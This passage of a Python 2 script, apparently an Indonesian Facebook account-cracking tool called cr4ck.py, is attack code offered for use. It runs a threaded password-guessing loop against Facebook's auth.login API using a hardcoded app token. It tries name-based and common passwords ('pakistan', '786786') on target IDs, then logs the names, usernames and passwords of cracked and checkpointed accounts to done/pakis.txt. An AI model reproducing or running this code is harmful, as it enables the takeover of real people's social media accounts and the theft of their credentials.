			if 'access_token' in ko:
				print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
				print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;92m") + j['name']
				print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
				print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos1
				oke = open("done/pakis.txt", "a")
				oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos1+"\n")
				oke.close()
				oks.append(zowe)
			else:
				if 'www.facebook.com' in ko['error_msg']:
					print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEK\033[1;91mPOINT")
					print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;91m") + j['name']
					print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;91m") + zowe
					print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;91m") + bos1
					cek = open("done/pakis.txt", "a")
					cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos1+"\n")
					cek.close()
					cekpoint.append(zowe)
				else:
					bos2 = j['first_name'].lower()+'1234'
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					ko = json.load(data)
					if 'access_token' in ko:
						print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
						print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;92m") + j['name']
						print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
						print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos2
						oke = open("done/pakis.txt", "a")
						oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos2+"\n")
						oke.close()
						oks.append(zowe)
					else:
						if 'www.facebook.com' in ko['error_msg']:
							print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEK\033[1;91mPOINT")
							print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;91m") + j['name']
							print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;91m") + zowe
							print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;91m") + bos2
							cek = open("done/pakis.txt", "a")
							cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos2+"\n")
							cek.close()
							cekpoint.append(zowe)
						else:
							bos3 = j['first_name'].lower()+'12345'
							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
							ko = json.load(data)
							if 'access_token' in ko:
								print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
								print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;92m") + j['name']
								print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
								print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos3
								oke = open("done/pakis.txt", "a")
								oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos3+"\n")
								oke.close()
								oks.append(zowe)
							else:
								if 'www.facebook.com' in ko['error_msg']:
									print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEK\033[1;91mPOINT")
									print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;91m") + j['name']
									print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;91m") + zowe
									print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;91m") + bos3
									cek = open("done/pakis.txt", "a")
									cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos3+"\n")
									cek.close()
									cekpoint.append(zowe)
								else:
									bos4 = ('pakistan')
									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
									ko = json.load(data)
									if 'access_token' in ko:
										print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
										print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;92m") + j['name']
										print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
										print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos4
										oke = open("done/pakis.txt", "a")
										oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos4+"\n")
										oke.close()
										oks.append(zowe)
									else:
										if 'www.facebook.com' in ko['error_msg']:
											print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;91mCEK\033[1;91mPOINT")
											print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;91m") + j['name']
											print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;91m") + zowe
											print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;91m") + bos4
											cek = open("done/pakis.txt", "a")
											cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos4+"\n")
											cek.close()
											cekpoint.append(zowe)
										else:
											bos5 = ('786786')
											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
											ko = json.load(data)
											if 'access_token' in ko:
												print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
												print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;92m") + j['name']
												print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
												print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos5
												oke = open("done/pakis.txt", "a")
												oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos5+"\n")
												oke.close()
												oks.append(zowe)
											else:
												if 'www.facebook.com' in ko['error_msg']:
													print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEK\033[1;91mPOINT")
													print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;91m") + j['name']
													print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;91m") + zowe
													print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;91m") + bos5
													cek = open("done/pakis.txt", "a")
													cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos5+"\n")
													cek.close()
													cekpoint.append(zowe)
												else:
													bos6 = j['last_name'].lower()+'786'
													data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
													ko = json.load(data)
													if 'access_token' in ko:
														print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
														print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;92m") + j['name']
														print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
														print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos6
														oke = open("done/pakis.txt", "a")
														oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos6+"\n")
														oke.close()
														oks.append(zowe)
													else:
														if 'www.facebook.com' in ko['error_msg']:
															print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEK\033[1;91mPOINT")
															print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;91m") + j['name']
															print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;91m") + zowe
															print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;91m") + bos6
															cek = open("done/pakis.txt", "a")
															cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos6+"\n")
															cek.close()
															cekpoint.append(zowe)
														else:
															bos7 = j['last_name'].lower()+'123'
															data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
															ko = json.load(data)
															if 'access_token' in ko:
																print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
																print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;92m") + j['name']
																print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
																print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos7
																oke = open("done/pakis.txt", "a")
																oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos7+"\n")
																oke.close()
																oks.append(zowe)
															else:
																if 'www.facebook.com' in ko['error_msg']:
																	print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;91mCEK\033[1;91mPOINT")
																	print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;91m") + j['name']
																	print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;91m") + zowe
																	print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;91m") + bos7
																	cek = open("done/pakis.txt", "a")
																	cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos7+"\n")
																	cek.close()
																	cekpoint.append(zowe)
																else:
																	bos8 = j['last_name'].lower()+'1234'
																	data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
																	ko = json.load(data)
																	if 'access_token' in ko:
																		print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
																		print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;92m") + j['name']
																		print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
																		print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos8
																		oke = open("done/pakis.txt", "a")
																		oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos8+"\n")
																		oke.close()
																		oks.append(zowe)
																	else:
																		if 'www.facebook.com' in ko['error_msg']:
																			print ("\n\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} \x1b[1;93mCEK\033[1;91mPOINT")
																			print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Name  \x1b[1;91m    --> \x1b[1;91m") + j['name']
																			print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;91m") + zowe
																			print ("\x1b[1;97m{\x1b[1;91m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;91m") + bos8
																			cek = open("done/pakis.txt", "a")
																			cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos8+"\n")
																			cek.close()
																			cekpoint.append(zowe)
																			
		except:
			pass
			
	p = ThreadPool(30)
	p.map(main, id)
	print "\n\033[1;94m──────────────────────────────────────────────────"
	print '\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mSelesai ...'
	print"\033[1;97m{\033[1;91m●\033[1;97m} \033[1;91mTotal \033[1;92mOK\033[1;97m/\x1b[1;91mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;91m"+str(len(cekpoint))
	print '\033[1;97m{\033[1;91m●\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;91mCP \033[1;91mfile tersimpan \033[1;91m: \033[1;92mdone/pakis.txt'
	print 50* "\033[1;94m─"
	raw_input("\033[1;97m{<\033[1;91mKembali\033[1;97m>}")
	os.system("python2 cr4ck.py")
	

##### USERNAME ID ####
def user_id():
	os.system('clear')
	print logo
	print 47* "\033[1;94m─"
	ling = ('https://www.facebook.com/')
	url = ling+raw_input("\033[1;97m{\033[1;95m×\033[1;97m} Username : ")
	idre = re.compile('"entity_id":"([0-9]+)"')
	page = requests.get(url)
	print idre.findall(page.content)
	raw_input("\n\033[1;95m[\033[1;97m<Back>\033[1;95m]")
	menu()
	
##### PERBARUI #####
def perbarui():
	os.system("clear")
	print logo
	print "\033[1;94m──────────────────────────────────────────────────"
	jalan ("\033[1;92mMemperbarui Script ...\033[1;93m")
	os.system("git pull origin master")
	raw_input("\n\033[1;94m{\033[1;97m<back>\033[1;94m}")
	os.system("python2 cr4ck.py")
	
if __name__=='__main__':
	menu()
	masuk()
